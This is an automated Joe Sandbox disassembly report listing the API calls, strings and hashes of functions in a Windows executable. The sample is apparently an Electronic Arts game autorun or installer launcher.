                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue_strrchr
                                                                                                                        • String ID: Desktop$Programs$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Startup$\
                                                                                                                        • API String ID: 2924401097-2691228934
                                                                                                                        • Opcode ID: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                        • Instruction ID: 758c6f36c939e7f1c2052588e335acff266e04ba565fef884f1b9ab40d81982e
                                                                                                                        • Opcode Fuzzy Hash: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                        • Instruction Fuzzy Hash: 5B511730208341AEE314CF25DC51FEB7BD45F95B06F14484DF9C497282EAB8E648C76A
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004431B7
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,0047EB48,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443208
                                                                                                                        • GlobalHandle.KERNEL32(?), ref: 00443211
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0044321B
                                                                                                                        • GlobalReAlloc.KERNEL32(?,0047EB48,00002002), ref: 0044322F
                                                                                                                        • GlobalHandle.KERNEL32(?), ref: 00443241
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00443248
                                                                                                                        • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443251
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0044325D
                                                                                                                        • LeaveCriticalSection.KERNEL32(0047EB28), ref: 004432A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2667261700-0
                                                                                                                        • Opcode ID: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                        • Instruction ID: b0708ac090b4c07532e2f73ad039cb67d6ce4f3aec897b0794ea91f6c69e5c79
                                                                                                                        • Opcode Fuzzy Hash: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                        • Instruction Fuzzy Hash: 0A31AB74600704AFEB20CF74CC48A5ABBF9FF86746B014A6EE852C3620DB75EA00CB54
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00437855
                                                                                                                        • GetClassInfoA.USER32(?,?,?), ref: 00437870
                                                                                                                        • RegisterClassA.USER32(?), ref: 00437883
                                                                                                                        • lstrlenA.KERNEL32(-00000034,00000001), ref: 004378BF
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004378C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3690589370-0
                                                                                                                        • Opcode ID: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                        • Instruction ID: d06448f70216e37ad6dd6e7a27fae02cd191811b199e5e129bd5a26421677b7e
                                                                                                                        • Opcode Fuzzy Hash: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                        • Instruction Fuzzy Hash: 2431F7B1904109FFDF11AFA0CD05BAEBFB4FF09315F004126F845A2251C7389A11DB99
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0043628D
                                                                                                                        • GetSystemMetrics.USER32(0000002A), ref: 00436351
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004363BC
                                                                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,00435D22,00000000), ref: 004363EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                                        • String ID: MS Shell Dlg
                                                                                                                        • API String ID: 2364537584-76309092
                                                                                                                        • Opcode ID: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                        • Instruction ID: 760bf385a5f842c8bc42ff6da57cfb0a7f61815e02265039a4cce4437fa5ada3
                                                                                                                        • Opcode Fuzzy Hash: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                        • Instruction Fuzzy Hash: 4951C230D00206AFCF10EFA4C8859EEBBB5EF49314F15966EF812E7291D7388944CB99
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040C539
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,00000000,00000000), ref: 0040C595
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryHandleModule
                                                                                                                        • String ID: %s\AutoRun$%s\DirectX$%s\Support$1.0$EA Game$Electronic Arts
                                                                                                                        • API String ID: 1119135582-703046973
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseDeleteNextSleep
                                                                                                                        • String ID: %s\%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                        • API String ID: 46525011-3194912456
                                                                                                                        APIs
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0043BF6C
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 0043BF74
                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043BF81
                                                                                                                        • GetDC.USER32(00000000), ref: 0043BF90
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043BFA4
                                                                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0043BFB0
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0043BFBB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                        • String ID: System
                                                                                                                        • API String ID: 46613423-3470857405
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 00429332
                                                                                                                        • __allrem.LIBCMT ref: 0042934A
                                                                                                                        • __allrem.LIBCMT ref: 00429366
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293A1
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293BD
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293D4
                                                                                                                          • Part of subcall function 0042DE49: __lock.LIBCMT ref: 0042DE61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                                        • String ID: E
                                                                                                                        • API String ID: 4106114094-3568589458
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00411158
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00411166
                                                                                                                        • LocalFree.KERNEL32(?,00000000,?,setSwapSize,00000000), ref: 00411184
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID: %I64d$SOFTWARE\$SwapSize$setSwapSize
                                                                                                                        • API String ID: 1365068426-648712029
                                                                                                                        • Opcode ID: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                        • Instruction ID: 68c570f812988241753bd2a04a9715a3b5369f07d8492d5d9d524d181d3e445a
                                                                                                                        • Opcode Fuzzy Hash: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                        • Instruction Fuzzy Hash: 96412571208341ABD314CF28C811BBBB7E5FBC9704F108A1EFA9597290DB75A846C79A
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00410FA8
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410FB6
                                                                                                                        • LocalFree.KERNEL32(?,00000000,?,setCacheSize,00000000), ref: 00410FD4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID: %I64d$CacheSize$SOFTWARE\$setCacheSize
                                                                                                                        • API String ID: 1365068426-3604744950
                                                                                                                        • Opcode ID: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                        • Instruction ID: 601950fcef0dd2d4f76d757b2b0c535ca4c20b87e929a9b96b2bb7084ee85d76
                                                                                                                        • Opcode Fuzzy Hash: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                        • Instruction Fuzzy Hash: DF4127712083429BD324DF28C811BBBB7E5FBC9704F104A1EF99597280DBB5A846C79A
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeA.VERSION(?,?,?,?,774E4B00), ref: 00417983
                                                                                                                        • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?,774E4B00), ref: 004179C5
                                                                                                                        • VerQueryValueA.VERSION(00000000,\VarFileInfo\Translation,0047E5B0,?,?,?,00000000,00000000,?,774E4B00), ref: 004179E2
                                                                                                                        • wsprintfA.USER32 ref: 00417A16
                                                                                                                        • VerQueryValueA.VERSION(00000000,00000000,?,?,?,?,00000000,00000000,?,774E4B00), ref: 00417A27
                                                                                                                        Strings
                                                                                                                        • \VarFileInfo\Translation, xrefs: 004179DC
                                                                                                                        • \StringFileInfo\%04x%04x\FileVersion, xrefs: 00417A10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInfoQueryValueVersion$Sizewsprintf
                                                                                                                        • String ID: \StringFileInfo\%04x%04x\FileVersion$\VarFileInfo\Translation
                                                                                                                        • API String ID: 2824581984-2452293203
                                                                                                                        • Opcode ID: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                        • Instruction ID: 9c2dee7650dbba52f5ac2e6fe99141784f30488717657b5f3132d8fa3abcba4e
                                                                                                                        • Opcode Fuzzy Hash: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                        • Instruction Fuzzy Hash: 5F41E3315482419FD321DA69D841EEFB7E89FD9344F04491EF88587201EA3CDA4A8BA6
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                          • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                          • Part of subcall function 00426C93: SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                          • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                          • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                          • Part of subcall function 00426C93: SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                          • Part of subcall function 00426C93: GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                        • SystemParametersInfoA.USER32(00002000,00000000,?,00000000), ref: 0040A684
                                                                                                                        • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000003), ref: 0040A691
                                                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 0040A6A5
                                                                                                                        • SystemParametersInfoA.USER32(00002000,00000000,?,00000003), ref: 0040A6BF
                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,00000000,?,00000001,?,?,?), ref: 0040A6D5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryInfoParametersSystem$AddressEnvironmentErrorExecuteLastLibraryLoadProcShellSleepVariable
                                                                                                                        • String ID: %s\%s$open
                                                                                                                        • API String ID: 2525041801-538903891
                                                                                                                        • Opcode ID: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                        • Instruction ID: 2af7baaca54277b22fbb167bc7bcba665f60fb619d4bc69c6d1dc5b5fddf270f
                                                                                                                        • Opcode Fuzzy Hash: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                        • Instruction Fuzzy Hash: 5741C672184340ABE220DF54EC42FEBB7A8EB98B10F04092EB695571C1DB75A518C7AB
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0042CE0F
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,0044D548,00000000,?,00000000,00000000,00000000,00000000), ref: 0042CEDC
                                                                                                                        • WriteFile.KERNEL32(00000000), ref: 0042CEE3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$HandleModuleNameWrite
                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                        • API String ID: 3784150691-4022980321
                                                                                                                        • Opcode ID: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                        • Instruction ID: c978e48409516c837b9f7d6b109fcdf73a8d35c650ed7adbf1cf9c7f4bbfdedb
                                                                                                                        • Opcode Fuzzy Hash: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                        • Instruction Fuzzy Hash: 84311532700224ABDB20AB75BCC2EAF3769EB45314FA1082FF515E3193DE3C9955866C
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                        • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                        • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                                                                        • String ID: .CHM$.HLP$.INI
                                                                                                                        • API String ID: 2140653559-4017452060
                                                                                                                        • Opcode ID: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                        • Instruction ID: 3da9f7d339a1fb26a9a14cda2295bd93ec93db32f178aaf1e18dcb2e1e69cc93
                                                                                                                        • Opcode Fuzzy Hash: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                        • Instruction Fuzzy Hash: 6E415D719407089FEB70EFA9D884A9A77E8BF08705F10482FF585D7241EB789640CB29
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0044D0A0,00000118,004247AD,00000001,00000000,0044C958,00000008,0042CEFA,00000000,00000000,00000000), ref: 0042B393
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                        • API String ID: 514040917-1673886896
                                                                                                                        • Opcode ID: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                        • Instruction ID: b314efe4c5fffc74cec8ecc2e7cadf2550e4b4112e7a556f74e2c9ec29160370
                                                                                                                        • Opcode Fuzzy Hash: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                        • Instruction Fuzzy Hash: 2A312331B012246BE701AB61AC82F9F37699F04718FA4406FF510A7293CB3C9A254B9D
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                        • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                        • GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$EnvironmentErrorLastVariable
                                                                                                                        • String ID: :$=
                                                                                                                        • API String ID: 373561786-2134709475
                                                                                                                        • Opcode ID: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                        • Instruction ID: 7366dd2e4e53350f74b67eef3e98498b2befc9c9fea16cefb053c97ee1566376
                                                                                                                        • Opcode Fuzzy Hash: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                        • Instruction Fuzzy Hash: C031DB71A042784BCB219F64AC456DEBBB4AF4A314F85019FE49492251CB385E91CF59
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32(774D0A60,00000000,?,?,?,?,00425792), ref: 0042D3F0
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00425792), ref: 0042D404
                                                                                                                        • GetEnvironmentStringsW.KERNEL32(774D0A60,00000000,?,?,?,?,00425792), ref: 0042D426
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,774D0A60,00000000,?,?,?,?,00425792), ref: 0042D45A
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00425792), ref: 0042D47C
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00425792), ref: 0042D495
                                                                                                                        • GetEnvironmentStrings.KERNEL32(774D0A60,00000000,?,?,?,?,00425792), ref: 0042D4AB
                                                                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042D4E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 883850110-0
                                                                                                                        • Opcode ID: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                        • Instruction ID: 472f25f2f3a0fa31c34653a7449e3421f98c337e42acfa1e6a6286993b93246e
                                                                                                                        • Opcode Fuzzy Hash: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                        • Instruction Fuzzy Hash: 7731F2B2F042746FD7207F75BC8493BB6ACEA463587A60A3FF545C3201D639AC41866E
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0042AF1E: GetLastError.KERNEL32(?,00000000,00427906,004297FA,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD), ref: 0042AF20
                                                                                                                          • Part of subcall function 0042AF1E: GetCurrentThreadId.KERNEL32 ref: 0042AF6D
                                                                                                                          • Part of subcall function 0042AF1E: SetLastError.KERNEL32(00000000,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8,0000000C), ref: 0042AF84
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A45
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A9E
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ABB
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ADE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLast$CurrentThread
                                                                                                                        • String ID: mE
                                                                                                                        • API String ID: 1370660682-852767849
                                                                                                                        • Opcode ID: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                        • Instruction ID: c8d6d545ca8254b81aa9c793cbca4ed0fd90ebe6b659f5e3f0dc62acac4ae604
                                                                                                                        • Opcode Fuzzy Hash: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                        • Instruction Fuzzy Hash: 0B61C4B6B00315AFDB14AF99CC41BAEB2B6EF88314F64452FF50097291D7B99D008B58
                                                                                                                        APIs
                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00411E74
                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00411EA7
                                                                                                                        • MessageBoxA.USER32(00000000,?,00446A11,00000001), ref: 00411F83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveDrivesLogicalMessageType
                                                                                                                        • String ID: %c:\$\Disk Images\$\Disk Images\Disk%d
                                                                                                                        • API String ID: 1359937597-868800301
                                                                                                                        • Opcode ID: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                        • Instruction ID: 8afbe327e4d74a6595be96fadd5310b57a40e0fcd72e5554749058cd2a1246b8
                                                                                                                        • Opcode Fuzzy Hash: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                        • Instruction Fuzzy Hash: 7061D2712043409BD330DB94DC81FEBB7E9EBC9310F44091FFA8987241EA79A945CB6A
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(?,?,0044EB50,00000038,0042C533,?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?), ref: 004325D2
                                                                                                                        • GetCPInfo.KERNEL32(?,00000001,?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 004325E5
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,0042C39D,?,?,00000008,?,?,00424C62,?), ref: 0043262A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info$ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1166650589-0
                                                                                                                        • Opcode ID: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                        • Instruction ID: ea13df6ffc39fcabe32b01fc689c9ae28562827eed5415b20872082be15f5b55
                                                                                                                        • Opcode Fuzzy Hash: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                        • Instruction Fuzzy Hash: E6519C70901218FBCF218F65ED858AFBBB8FF89750F20512AF814A2250D7755D41CB68
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00438800
                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00438827
                                                                                                                        • UpdateWindow.USER32(?), ref: 00438841
